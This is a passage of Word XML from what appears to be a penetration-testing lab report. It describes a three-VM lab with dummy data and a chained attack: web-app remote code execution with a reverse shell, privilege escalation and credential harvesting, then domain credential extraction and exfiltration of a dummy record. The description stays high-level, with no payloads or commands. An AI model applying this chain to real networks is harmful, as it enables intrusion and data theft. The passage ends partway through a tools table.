              </w:rPr>
              <w:t>Client / file server holding ‘sensitive’ dummy data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2744" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4A3E550E" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows 10/11 with a file share</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3529" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5451D20D" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Over-permissive share hosting a sample customer database record</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5422665D" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc234776727"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>All “sensitive” data is dummy manufactured material (e.g. a single bogus customer record) put only to be the exfiltration target. All three VMs are snapshotted before any intrusive procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3AB229" w14:textId="3BE826B9" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.4 Exploitation — Three Distinct Exploits</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="0E4DEC5A" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc234776728"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The end-to-end chain consists of three independent attacks targeting three different VM or service. Actions are detailed at a high, scholarly level, consistent with the assessment’s ethical constraint: preconditions, vulnerability class, method, artefacts and evidence of success – without disclosing weaponised payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADB8AA0" w14:textId="0766D033" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploit A — Remote Code Execution on the Web Application (VM-2)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="787BE587" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76" w:rsidP="00732C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Precondition: network reachability to VM-2, known vulnerable web-application component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671EAEC" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76" w:rsidP="00732C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability class: unauthenticated remote code execution in an obsolete web application (e.g. unpatched CMS plugin or file-upload bug) that maps to ATT&amp;CK T1190 (Exploit Public-Facing Application) and OWASP injection/insecure-design categories.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId37">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[4]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId38">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">[5]</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59EC6CD8" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method (high level): After enumeration to confirm the application version, a known vulnerability was exploited to achieve command execution as the web-service account and a reverse shell was opened to the attacker host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9799A9" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc234776729"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Artefacts / evidence: web-server access logs showing the fraudulent request; reverse-shell session; web-service user identity validated using a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-equivalent command. Evidence pack includes screenshots and sanitised logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4283E82E" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05263D0C" w14:textId="01EED592" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploit B — Privilege Escalation and Credential Harvest (VM-2 → domain)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="2700B799" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Precondition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>a low-privileged shell on VM-2 from Exploit A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619031EF" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability class: </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">local privilege escalation via a misconfiguration (e.g. a writable service, SUID binary or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> misconfiguration), ATT&amp;CK T1068/T1548, followed by credential access (T1552 — credentials in files/config).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E49D8D8" w14:textId="1DE3E26C" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method (high level</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>) :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> enumeration of the local host discovered an escalation path to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Configuration files and stored credentials were collected resulting in domain-usable credentials that allowed the pivot towards VM-1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AF6E02" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc234776730"/>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Artefacts / evidence: before/after privilege context (service user → root); recovered credential material (redacted); command history documented for the report. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B51FB2C" w14:textId="63C3CD7F" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Exploit C — Lateral Movement and Sensitive-Data Access (VM-1 / VM-3)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="431DC790" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Precondition: </w:t>
      </w:r>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>valid domain credentials from Exploit B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513C2E8F" w14:textId="77777777" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability class: exploitation of legitimate authorized access (T1078 – Valid Accounts) in combination with credential access from the Domain Controller (T1003.003 – NTDS) and access to an over-permissive file sharing (T1039 – Data from Network Shared Drive).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59ADE1D2" w14:textId="77777777" w:rsidR="00B8582B" w:rsidRPr="00796916" w:rsidRDefault="00732C76" w:rsidP="00B8582B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Method (high level): - Harvested credentials were used to authenticate to the internal domain. - Domain credential material was extracted from VM-1. - The resultant access was used to reach the over-permissive share on VM-3, where the sample customer record was located and copied to the attacker host, fulfilling the engagement objective.</w:t>
      </w:r>
      <w:bookmarkStart w:id="23" w:name="_Toc234776731"/>
    </w:p>
    <w:p w14:paraId="0984B234" w14:textId="4FA7211B" w:rsidR="00732C76" w:rsidRPr="00796916" w:rsidRDefault="00732C76" w:rsidP="00B8582B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Artefacts / proof: authentication events on VM-1; the extracted (redacted) credential; the recovered dummy customer record on the attacker host; a packet capture of the transfer constituting exfiltration evidence (T1041).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC71BC" w14:textId="191303C7" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3.5 Tools and Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="5AD3EAF9" w14:textId="762704EE" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00B8582B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00796916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>All offensive tooling is declared and justified here, differentiating actual tools used in the lab from simulated capacity.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2554"/>
        <w:gridCol w:w="4911"/>
        <w:gridCol w:w="1895"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="7848157D" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0EEA3CB5" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4911" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B27B4F5" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1F3864"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4D56069A" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real / Simulated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="3BC7111F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2554" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
